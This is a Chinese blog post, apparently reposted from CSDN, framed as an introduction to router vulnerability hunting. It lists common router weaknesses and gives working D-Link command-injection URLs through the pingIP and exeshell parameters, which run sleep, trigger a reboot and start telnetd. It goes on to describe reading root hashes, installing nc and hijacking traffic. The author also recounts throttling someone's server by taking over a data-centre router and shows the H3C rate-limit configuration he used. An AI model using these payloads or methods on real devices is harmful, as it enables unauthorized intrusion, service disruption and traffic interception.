浅谈路由器漏洞挖掘(科普文)

匿名 (未验证) 提交于 2019-12-02 23:43:01

版权声明:署名,允许他人基于本文进行创作,且必须基于与原先许可协议相同的许可协议分发本文 (Creative Commons

想在国内找一些路由渗透的纪实,但还是木有什么结果,就是今晚给国内某路由厂商提交一些漏洞时,还被人家鄙视了,哎。什么狗屁心态。不管了,留给我未来的 儿子玩吧。说不定可以搞出什么东西。呵呵,扯远了,今晚就结合国外的一些科普文做一些讲解吧。大牛别喷我,我也只是自己写写笔记意淫意淫….别喷!

++++++我是淫荡的分割线++++++++

一,为什么要定义单独的路由安全?

(1)对于渗透湿而言:

如今,更多的渗透湿都是重在于web层的渗透,总是通过各种大杀器拿下内网机器权限,然后各种嗅探,但半天才发现,坑!内网划分了vlan 。(tip:VLAN(Virtual Local Area Network)的中文名为”虚拟局域网”。VLAN是一种将局域网设备从逻辑上划分成一个个网段,从而实现虚拟工作组的新兴数据交换技术。这一新兴技术 主要应用于交换机和路由器中,但主流应用还是在交换机之中。)对于到这一层,很多人都是放弃了,或者去换了别的奇技淫巧,更是APT.但往往我们的收获却 是很少很少,对于那些白帽做内网的授权渗透时,web服务器的数量更是越来越少,但由于公司对员工的管理以及安全部署,更是划分了各种vlan保护数据的 安全和员工的限制。有些对数据敏感的公司,为了防止来公司参观的领导和游客分别划分了wifi 的vlan,这是为什么?原来越多渠道通过wifi和路由安全这个平台向内网的数据伸手,由wifi到核心数据盗取的案例已经很多了,手法都是差不多的, 你懂的。

(2)对于管理员而言:

路由器和交换机,还有硬防只是个用来联网的设备,而这些也往往是问题的所在,如今的管理员更多投入在服务器的安全上,网站打开慢?mysql发包 数没设置好吧!有时开的有时卡?论坛插件太臃肿了吧!甚至是监控平台,都仅仅是写系统的性能状况。。却没关注路由的安全。你会说,靠,黄昏,扯了半天,你 还是没把我的站日下….我给我自己划了个vlan,vps用了某某宝加速,还用某某狗看门,看你怎么进,跟你说喔,上周某某宝还举行比赛,然后添加了很多 规则,我看你怎么绕。。。 看到这里,我也顿时语塞,难度好大……

换一种方法,找到另一个vlan,没狗狗,没宝宝的,然后提权……通过命令识别路由类型和型号,最后在网上找到路由漏洞的exp,拿到路由权限…(ps:这里环境很多,有三层交换机的,还有注意其中的树协议 )

然后就是限速啦~!这里就是h3c的限速规则

# 配置ACL规则匹配源IP为10.0.0.2的流量 
<H3C> system-view [H3C] acl number 3001 [H3C-acl-adv-3001] rule permit ip source 10.0.0.2 0 [H3C-acl-adv-3001] quit 
# 配置ACL规则匹配目的IP为10.0.0.20的流量 
[H3C] acl number 3002 [H3C-acl-adv-3002] rule permit ip destination 10.0.0.2 0 [H3C-acl-adv-3002] quit 
# 配置流分类,匹配ACL规则3001,即匹配源IP为10.0.0.20的流量 
[H3C] traffic classifier source_hostA [H3C-classifier-source_hostA] if-match acl 3001 [H3C-classifier-source_hostA] quit 
# 配置流分类,匹配ACL规则3002,即匹配目的IP为10.0.0.20的流量 
[H3C] traffic classifier destination_hostA [H3C-classifier-destination_hostA] if-match acl 3002 [H3C-classifier-destination_hostA] quit 
# 配置流行为,用于对上行流量进行流量监管,速率为100kbps 
[H3C] traffic behavior uplink [H3C-behavior-uplink] car cir 100 [H3C-behavior-uplink] quit 
# 配置流行为,用于对下行流量进行流量监管,速率为100kbps 
[H3C] traffic behavior downlink [H3C-behavior-downlink] car cir 100 [H3C-behavior-downlink] quit 
# 配置QoS策略,用于端口入方向,即用户的上行方向 
[H3C] qos policy uplink [H3C-qospolicy-uplink] classifier source_hostA behavior uplink [H3C-qospolicy-uplink] quit 
# 配置QoS策略,用于端口出方向,即用户的下行方向 
[H3C] qos policy downlink [H3C-qospolicy-downlink] classifier destination_hostA behavior downlink [H3C-qospolicy-downlink] quit 
# 在端口上下发QoS策略,匹配出入方向的流量 
[H3C] interface GigabitEthernet 3/0/1 [H3C-GigabitEthernet3/0/1] qos apply policy uplink inbound [H3C-GigabitEthernet3/0/1] qos apply policy downlink outbound 

然后处于内网的10.0.0.20 ,上传只有1kb 下载只有1kb 了,网站就这样开不了了

开始那个机油以为我爆了dns的菊花,但结果并不是,DDOS?我一个小菜怎么肯能干掉某宝宝。。。最后告诉他是我改了中控路由。。。最最后怎么 办,只好协同机房的机油一起修补了这个洞……方法就是 更新路由器固件 。简单点说法,就是给路由器刷机….点到即止。。只要拿到了路由权限可以干很多事情!!!因为你手里控制着整个机房的流量…你说流量能干吗???

建议你去看看刺总的文章,详情猛戳 这里 互联网如何赚钱 http://taosay.net/?p=506

二.废话后的冰J凌

(1)好热的天….扯了这么多废话,再次回到路由器的构架上….

无论何时何地,路由器的配置总是最低的 一般都是4~128MB的内存 4M或者8MB的闪存,还有80~900HZ的处理器,哎,现在的手机处理器动不动就是双核1.5GHz 完爆路由器配置啊,但是路由器只是作为一个行为管理和流量,协议处理的机器,并不需要太多的页面于用户进行交互,所以,没有所以了,大部分路由器都是采用 linux系统,所以很多时候可以通过内核漏洞进行远程溢出或者其他方法提权。

(2) 默认密码,不同路有密码不一样…还有一些路由返厂密码…唉,利用方法后边会介绍的

(3) 默认的telnet

(4) 开放的端口

PORT    STATE SERVICE 21/tcp  open  ftp 80/tcp  open  http 139/tcp open  netbios-ssn 445/tcp open  microsoft-ds 

(5) 呵呵,猥琐的时候,能接触到实体机,可以自己改装JTAG接口直接读数据…啪啪啪

(6) Web登陆界面的burp爆破…你懂的

(7) 很多地方没有过滤,可以用很多姿势插入代码(xss)

(8) 管理员认证绕过

(9) 远程命令执行….啪啪啪

(10) perl有着“taint mode” php输出未认证和过滤

(11) 网站和路由器往往与JS验证输入,而不是之后GET / POST

(12) 通过劫持输出源,并加以利用,比如说QQ空间载入的第一个跳转。。呵呵,你懂的

(13) 目录遍历,password文件下载

以上都是总结出来的…

下边来个实例 D-LINK的….

比如说 ping测试,可以被系统直接调用,和输出,但这里木有过滤

http://192.168.0.1/tools_vct.php?pingIP=192.168.0.1 

我们可以用这种姿势插入

比如说让路由器进入休眠状态,后入!后入30个休眠命令

http://192.168.0.1/tools_vct.php?pingIP=127.0.0.1%3B%20sleep,2030% 

其中要加入个空格,转成20% ,很多时候做路由渗透测试,没有进行转义,导致没有执行成功就以为没有洞….我就因此错过了几个,虽然后边自己也发现了,所以在这提醒一下大家 :D

睡前再来条黄瓜吧,这条黄瓜就是

http://192.168.0.1/tools_system.php

它能够重启路由器,也就是能被系统直接调用,后来我们在路由器固件里发现了利用的js

http://192.168.0.1/sys_config_valid.xgi?exeshell=submit%20REBOOT 

唉,就像是csrf+远程命令执行

exeshell是一个非常淫荡的变量名

还可以这样继续插入,啪啪啪,路由器休眠了

http://192.168.0.1/sys_config_valid.xgi?exeshell =%60sleep 30%60 

前边提到了exeshell是一个非常淫荡的变量名

然后我们这样插入

http://192.168.0.1/sys_config_valid.xgi?exeshell =%60telnetd%60 

然后你的telnet就打开了,我能干啥???你说我能干啥??我还能干啥?直接用这个exeshell读取root的hash值,然后啪啪啪进入你的telnet,装个改装版的nc,直接进行流量劫持….我感觉这个才是真正的流量劫持啊……

总结

Routerpwn

Routerpwn渗透测试是一种住宅的路由器的安全审计工具。

这是一个编译运行本地和远程网络攻击的准备。 JavaScript和HTML编程以运行在所有的“智能手机和移动互联网设备。您可以使用当地开采离线没有互联网连接。 您可以更改,目的IP地址,点击[IP]链接旁边的漏洞。

其中可以利用

DNS-320的D-Link DNS-325执行命令
DNS-320的D-Link DNS-325的信息披露
DNS-320的D-Link DNS-325的信息披露
TRENDNET TV-IP摄像机绕过认证

还有什么缺的地方大家提出来一起探讨吧

文章来源: https://blog.csdn.net/kclax/article/details/92394558
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!